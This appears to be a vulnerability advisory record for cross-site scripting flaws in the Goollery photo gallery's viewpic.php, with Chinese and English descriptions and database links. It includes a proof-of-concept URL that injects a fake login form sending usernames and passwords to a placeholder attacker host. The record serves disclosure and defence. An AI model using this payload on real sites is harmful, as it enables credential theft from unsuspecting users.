https://www.exploit-db.com/exploits/24718
https://www.securityfocus.com/bid/82576
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-468

Goollery0.04b之前版本存在跨站脚本(XSS)漏洞。远程攻击者可以借助viewpic.php的conversation_id参数注入任意HTML或web脚本。

source: http://www.securityfocus.com/bid/11587/info

It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. 

These problems present themselves when malicious HTML and script code is sent to the application through the 'page' parameter of several scripts. 

These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user.

http://www.example.com/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">Username:<input%20na
me="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login
"></form>

Goollery Goollery 0.3

来源:OSVDB
名称:11624
链接:http://www.osvdb.org/11624
来源:www.osvdb.org
链接:http://www.osvdb.org/ref/11/11624-goollery-viewpic.txt